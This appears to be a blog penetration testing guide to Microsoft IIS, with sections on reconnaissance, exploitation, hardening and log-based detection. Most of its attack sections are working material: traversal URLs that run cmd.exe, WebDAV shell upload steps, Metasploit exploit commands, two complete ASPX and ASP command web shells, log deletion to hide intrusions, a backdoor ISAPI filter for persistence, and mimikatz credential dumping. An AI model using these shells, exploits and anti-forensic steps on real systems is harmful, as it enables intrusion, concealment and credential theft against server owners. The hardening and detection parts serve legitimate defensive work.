IIS Attack Vectors: Complete Penetration Testing Guide

Comprehensive guide to IIS (Internet Information Services) penetration testing, covering reconnaissance, exploitation techniques, and security hardening.

ibrahimsql

Internet Information Services (IIS) is Microsoft's web server that powers millions of websites worldwide. This comprehensive guide covers advanced penetration testing techniques specifically targeting IIS web servers.

IIS Architecture Overview

Core Components

  • HTTP.sys: Kernel-mode driver handling HTTP requests
  • Worker Processes (w3wp.exe): Application execution environment
  • Application Pools: Isolation boundaries for applications
  • ISAPI Extensions: Dynamic content processing
  • IIS Manager: Administrative interface

Common IIS Versions

  • IIS 6.0: Windows Server 2003
  • IIS 7.0/7.5: Windows Server 2008/2008 R2
  • IIS 8.0/8.5: Windows Server 2012/2012 R2
  • IIS 10.0: Windows Server 2016/2019/2022

Initial Reconnaissance

Server Identification

```bash
# HTTP header analysis
curl -I http://target.com
whatweb http://target.com

# Nmap HTTP enumeration
nmap -p 80,443 --script http-enum,http-headers target.com

# IIS version detection
nmap -p 80,443 --script http-iis-webdav-vuln target.com
```

Directory and File Enumeration

```bash
# Common IIS directories
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x asp,aspx,config

# IIS-specific paths
ffuf -w iis-paths.txt -u http://target.com/FUZZ

# Configuration files
curl http://target.com/web.config
curl http://target.com/global.asax
curl http://target.com/bin/
```

WebDAV Detection

```bash
# WebDAV enumeration
davtest -url http://target.com
cadaver http://target.com

# WebDAV methods testing
curl -X OPTIONS http://target.com
curl -X PROPFIND http://target.com
```

Common IIS Vulnerabilities

Directory Traversal Attacks

```bash
# Unicode directory traversal (IIS 5.0)
curl "http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"

# Double decode attack
curl "http://target.com/scripts/..%252f../winnt/system32/cmd.exe?/c+dir"

# Alternate data streams
curl "http://target.com/default.asp::$DATA"
```

Authentication Bypass

```bash
# NTLM authentication bypass
curl -H "Authorization: NTLM" http://target.com/admin/

# Basic authentication brute force
hydra -L users.txt -P passwords.txt http-get://target.com/admin/

# Windows authentication enumeration
enum4linux target.com
```

ASP.NET Vulnerabilities

```bash
# ViewState manipulation
python viewstate-decoder.py -d "viewstate_value"

# .NET framework enumeration
curl http://target.com/trace.axd
curl http://target.com/elmah.axd

# Configuration disclosure
curl http://target.com/web.config.bak
curl http://target.com/global.asax.cs
```

Exploitation Techniques

WebDAV Exploitation

```bash
# Upload malicious files via WebDAV
curl -X PUT http://target.com/shell.txt -d @shell.asp
curl -X MOVE http://target.com/shell.txt -H "Destination: http://target.com/shell.asp"

# WebDAV shell upload
msfconsole
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS target.com
set HttpUsername username
set HttpPassword password
exploit
```

IIS Short Name Scanning

```bash
# Short name enumeration
java -jar IISShortNameScanner.jar 2 20 http://target.com/

# Manual short name testing
curl "http://target.com/PROGRA~1/"
curl "http://target.com/ADMINI~1/"
```

Buffer Overflow Exploits

```text
# IIS 6.0 WebDAV buffer overflow
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS target.com
set RPORT 80
exploit

# IIS FTP buffer overflow
use exploit/windows/ftp/iis_ftp_service
set RHOSTS target.com
exploit
```

ASP/ASPX Code Injection

```asp
<%
' ASP code injection
Dim objShell
Set objShell = Server.CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c " & Request.QueryString("cmd")
%>
```

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e)
{
    string cmd = Request.QueryString["cmd"];
    Process.Start("cmd.exe", "/c " + cmd);
}
</script>
```

Advanced Attack Vectors

IIS Application Pool Attacks

```text
# Application pool enumeration
appcmd list apppool
appcmd list app

# Process injection into w3wp.exe
migrate -P w3wp.exe

# Application pool privilege escalation
use post/windows/escalate/service_permissions
```

HTTP.sys Vulnerabilities

```text
# HTTP.sys remote code execution
msfconsole
use exploit/windows/http/ms15_034_http_sys_webdav
set RHOSTS target.com
exploit

# HTTP request smuggling
python http-request-smuggler.py -u http://target.com
```

IIS Modules Exploitation

```text
# ISAPI filter exploitation
msfconsole
use exploit/windows/isapi/rsa_webagent
set RHOSTS target.com
exploit

# CGI exploitation
use exploit/multi/http/cgi_argument_injection
set RHOSTS target.com
set TARGETURI /cgi-bin/vulnerable.cgi
exploit
```

Post-Exploitation Techniques

IIS Log Analysis and Evasion

```powershell
# Clear IIS logs
Get-ChildItem "C:\inetpub\logs\LogFiles" -Recurse | Remove-Item -Force

# Modify IIS logs
$logPath = "C:\inetpub\logs\LogFiles\W3SVC1"
Get-Content "$logPath\*.log" | Where-Object {$_ -notmatch "malicious_request"} | Set-Content "$logPath\cleaned.log"
```

Persistence via IIS

```powershell
# Install malicious ISAPI filter
Copy-Item "backdoor.dll" "C:\Windows\System32\inetsrv\"
Import-Module WebAdministration
Add-WebConfigurationProperty -Filter "/system.webServer/isapiFilters" -Name "." -Value @{name="backdoor";path="C:\Windows\System32\inetsrv\backdoor.dll"}

# Create malicious virtual directory
New-WebVirtualDirectory -Site "Default Web Site" -Name "backdoor" -PhysicalPath "C:\backdoor"
```

Memory Dump Analysis

```text
# Dump w3wp.exe process memory
procdump -ma w3wp.exe w3wp.dmp

# Extract credentials from memory
mimikatz "sekurlsa::minidump w3wp.dmp" "sekurlsa::logonpasswords"

# Search for sensitive data
strings w3wp.dmp | grep -i password
```

IIS-Specific Payloads

ASPX Web Shell

```aspx
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
    string ExcuteCmd(string arg)
    {
        ProcessStartInfo psi = new ProcessStartInfo();
        psi.FileName = "cmd.exe";
        psi.Arguments = "/c " + arg;
        psi.RedirectStandardOutput = true;
        psi.UseShellExecute = false;
        Process p = Process.Start(psi);
        StreamReader stmrdr = p.StandardOutput;
        string s = stmrdr.ReadToEnd();
        stmrdr.Close();
        return s;
    }
    string cmd = Request.Form["cmd"];
    if (cmd != null)
    {
        Response.Write("<pre>");
        Response.Write(ExcuteCmd(cmd));
        Response.Write("</pre>");
    }
}
</script>
<HTML>
<HEAD>
<title>ASPX Shell</title>
</HEAD>
<body>
<form method="POST">
<input type="text" name="cmd" size="50" value="<%=Request.Form["cmd"]%>">
<input type="submit" value="Execute">
</form>
</body>
</HTML>
```

Classic ASP Shell

```asp
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<HEAD>
<title>ASP Shell</title>
</HEAD>
<body>
<FORM action="" method="POST">
<input type="text" name=".CMD" size="45" value="<%=szCMD%>">
<input type="submit" value="Execute">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</body>
</HTML>
```

Defense Evasion

Request Obfuscation

```bash
# URL encoding
curl "http://target.com/%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fcmd.exe"

# Double URL encoding
curl "http://target.com/%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fcmd.exe"

# Unicode encoding
curl "http://target.com/\u002e\u002e\u002f\u002e\u002e\u002fwindows\u002fsystem32\u002fcmd.exe"
```

HTTP Header Manipulation

```bash
# X-Forwarded-For spoofing
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com/admin/

# User-Agent manipulation
curl -H "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)" http://target.com/

# Host header injection
curl -H "Host: evil.com" http://target.com/
```

Security Hardening

IIS Configuration Hardening

```powershell
# Disable unnecessary HTTP methods
Import-Module WebAdministration
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/verbs" -Name "allowUnlisted" -Value $false
Add-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/verbs" -Name "." -Value @{verb="GET";allowed="true"}
Add-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/verbs" -Name "." -Value @{verb="POST";allowed="true"}

# Configure request filtering
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/requestLimits" -Name "maxAllowedContentLength" -Value 30000000
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/requestLimits" -Name "maxUrl" -Value 4096
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/requestLimits" -Name "maxQueryString" -Value 2048

# Hide server information
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering" -Name "removeServerHeader" -Value $true
```
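The same requestFiltering settings can be checked offline against an exported web.config. The following Python is an added example, not code from the original post or from Microsoft; the two XML fragments are constructed samples showing a permissive configuration beside the hardened state the commands above produce.

```python
import xml.etree.ElementTree as ET
# Constructed sample: permissive settings (any verb accepted, generous limits, Server header kept).
WEAK_CONFIG = """<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <verbs allowUnlisted="true" />
        <requestLimits maxAllowedContentLength="300000000" maxUrl="8192" maxQueryString="8192" />
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""
# Constructed sample: the state the Set-/Add-WebConfigurationProperty calls above produce.
HARDENED_CONFIG = """<configuration>
  <system.webServer>
    <security>
      <requestFiltering removeServerHeader="true">
        <verbs allowUnlisted="false">
          <add verb="GET" allowed="true" />
          <add verb="POST" allowed="true" />
        </verbs>
        <requestLimits maxAllowedContentLength="30000000" maxUrl="4096" maxQueryString="2048" />
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""
# Ceilings from the hardening commands; they equal the IIS defaults, so an absent attribute passes.
LIMITS = {"maxAllowedContentLength": 30000000, "maxUrl": 4096, "maxQueryString": 2048}

def audit_request_filtering(config_xml: str) -> list:
    """Return findings for the requestFiltering section; an empty list means hardened."""
    findings = []
    rf = next(ET.fromstring(config_xml).iter("requestFiltering"), None)
    if rf is None:
        return ["requestFiltering section missing: IIS defaults apply"]
    verbs = rf.find("verbs")
    if verbs is None or verbs.get("allowUnlisted", "true").lower() != "false":
        findings.append("verbs allowUnlisted is not false: WebDAV methods like PROPFIND, PUT and MOVE are accepted")
    else:
        allowed = {v.get("verb", "").upper() for v in verbs.findall("add") if v.get("allowed", "true").lower() == "true"}
        findings.extend(f"verb {verb} is explicitly allowed" for verb in sorted(allowed - {"GET", "POST", "HEAD"}))
    limits = rf.find("requestLimits")
    for name, ceiling in LIMITS.items():
        value = int(limits.get(name, ceiling)) if limits is not None else ceiling
        if value > ceiling:
            findings.append(f"requestLimits {name}={value} exceeds {ceiling}")
    if rf.get("removeServerHeader", "false").lower() != "true":
        findings.append("removeServerHeader is not true: the Server header discloses the IIS version")
    return findings
```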

Application Pool Security

```powershell
# Configure application pool identity
Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "processModel.identityType" -Value "ApplicationPoolIdentity"

# Enable application pool isolation
# Note: processModel.isolationLevel is not a documented IIS app pool property;
# confirm it exists with Get-ItemProperty on your IIS version before relying on it.
Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "processModel.isolationLevel" -Value "HighIsolation"

# Configure recycling conditions
Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "recycling.periodicRestart.time" -Value "01:00:00"
```

SSL/TLS Configuration

```powershell
# Disable weak protocols
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -Name "Enabled" -Value 0 -PropertyType DWORD

# Configure cipher suites
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002" -Name "Functions" -Value "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256" -PropertyType String
```

Monitoring and Detection

IIS Log Analysis

```powershell
# Parse IIS logs for suspicious activity
Get-Content "C:\inetpub\logs\LogFiles\W3SVC1\*.log" |
    Where-Object { $_ -match "(\.\.|\.\.\/|%2e%2e|%252e|cmd\.exe|powershell|whoami|net user)" } |
    Select-String -Pattern "(GET|POST)" |
    Format-Table

# Monitor for WebDAV activities
Get-Content "C:\inetpub\logs\LogFiles\W3SVC1\*.log" |
    Where-Object { $_ -match "(PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK)" }
```
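Added example (not from the original post): the same indicators as the Where-Object filter above, applied to W3C-format IIS log lines after the URL has been canonicalised, so the overlong-UTF-8, double-encoded and backslash-u variants shown in the Directory Traversal and Request Obfuscation sections are caught as well. The log excerpt is constructed; field order follows its #Fields: directive.

```python
import re
from urllib.parse import unquote_to_bytes
# Constructed W3C extended log excerpt (not from a real server).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-03-01 10:22:31 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 80 - 203.0.113.7 curl/8.4.0 404
2024-03-01 10:22:35 10.0.0.5 GET /%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fcmd.exe - 80 - 203.0.113.7 curl/8.4.0 404
2024-03-01 10:22:40 10.0.0.5 PROPFIND /shell.txt - 80 - 203.0.113.7 cadaver/0.23 207
2024-03-01 10:23:01 10.0.0.5 GET /default.asp::$DATA - 80 - 203.0.113.7 curl/8.4.0 404
2024-03-01 10:23:10 10.0.0.5 GET /index.aspx page=2 80 - 198.51.100.4 Mozilla/5.0 200"""
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "PUT"}
SUSPICIOUS = re.compile(r"(\.\./|\.\.\\|cmd\.exe|powershell|whoami|net user|::\$data)", re.I)  # as in the filter above

def canonicalize(uri: str, rounds: int = 3) -> str:
    """Undo layered encodings: backslash-u escapes, repeated percent-encoding (double
    encoding) and overlong two-byte UTF-8 such as %c0%af, which IIS 5.0 decoded as '/'."""
    uri = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), uri)
    for _ in range(rounds):
        if "%" not in uri:
            break
        raw, out, i = unquote_to_bytes(uri), [], 0
        while i < len(raw):
            b = raw[i]
            if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
                out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))  # overlong sequence
                i += 2
            else:
                out.append(chr(b))  # keep other bytes as Latin-1 so nothing is dropped
                i += 1
        uri = "".join(out)
    return uri

def parse_w3c(log_text: str):
    """Yield one dict per request, keyed by the names in the #Fields: directive."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def find_suspicious(log_text: str) -> list:
    """Return (client ip, method, canonical uri) for every request worth an alert."""
    hits = []
    for rec in parse_w3c(log_text):
        query = "" if rec["cs-uri-query"] == "-" else "?" + rec["cs-uri-query"]
        uri = canonicalize(rec["cs-uri-stem"] + query)
        if rec["cs-method"].upper() in WEBDAV_METHODS or SUSPICIOUS.search(uri):
            hits.append((rec["c-ip"], rec["cs-method"].upper(), uri))
    return hits
```

Run `find_suspicious` over a real log file's text to get the list of alerts; the benign `/index.aspx?page=2` request in the sample produces none.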

Real-time Monitoring

```powershell
# Monitor w3wp.exe processes
Get-Process w3wp | Select-Object Id,ProcessName,CPU,WorkingSet,StartTime

# Monitor file system changes
Register-WmiEvent -Query "SELECT * FROM Win32_VolumeChangeEvent WHERE DriveName = 'C:'" -Action { Write-Host "File system change detected" }
```

Automated Testing Tools

IIS-Specific Scanners

```bash
# IISShortNameScanner
java -jar IISShortNameScanner.jar 2 20 http://target.com/

# IIS-Shortname-Scanner
python iis_shortname_scanner.py -u http://target.com/

# Nikto web scanner
nikto -h http://target.com/ -Tuning 1,2,3,4,5,6,7,8,9,0
```

Custom Scripts

```python
#!/usr/bin/env python3
import requests
import sys


def test_iis_vulnerabilities(target):
    """Test common IIS vulnerabilities"""
    vulnerabilities = [
        "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
        "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
        "/default.asp::$DATA",
        "/_vti_bin/",
        "/web.config",
        "/global.asax",
    ]
    for vuln in vulnerabilities:
        try:
            response = requests.get(f"{target}{vuln}", timeout=10)
            if response.status_code == 200:
                print(f"[+] Potential vulnerability: {vuln}")
                print(f"    Status: {response.status_code}")
                print(f"    Length: {len(response.content)}")
        except requests.RequestException as e:
            print(f"[-] Error testing {vuln}: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 iis_scanner.py <target_url>")
        sys.exit(1)
    target = sys.argv[1]
    test_iis_vulnerabilities(target)
```

Conclusion

IIS penetration testing requires understanding both the web server architecture and Windows-specific attack vectors. Key areas to focus on include:

  • Configuration weaknesses: Default settings and misconfigurations
  • Application vulnerabilities: ASP/ASP.NET specific issues
  • Authentication bypasses: Windows authentication weaknesses
  • File system access: Directory traversal and file disclosure
  • WebDAV exploitation: Upload and execution capabilities

Best Practices for Testers

  1. Comprehensive enumeration: Use multiple tools and techniques
  2. Version-specific testing: Target known vulnerabilities for specific IIS versions
  3. Application-aware testing: Understand the hosted applications
  4. Post-exploitation focus: Leverage Windows-specific techniques
  5. Documentation: Provide clear remediation guidance

Remediation Priorities

  1. Patch management: Keep IIS and Windows updated
  2. Configuration hardening: Follow Microsoft security guidelines
  3. Access controls: Implement proper authentication and authorization
  4. Monitoring: Deploy comprehensive logging and alerting
  5. Network segmentation: Isolate web servers from critical systems

This content is for educational and authorized testing purposes only. Always ensure you have proper permission before conducting any security testing.
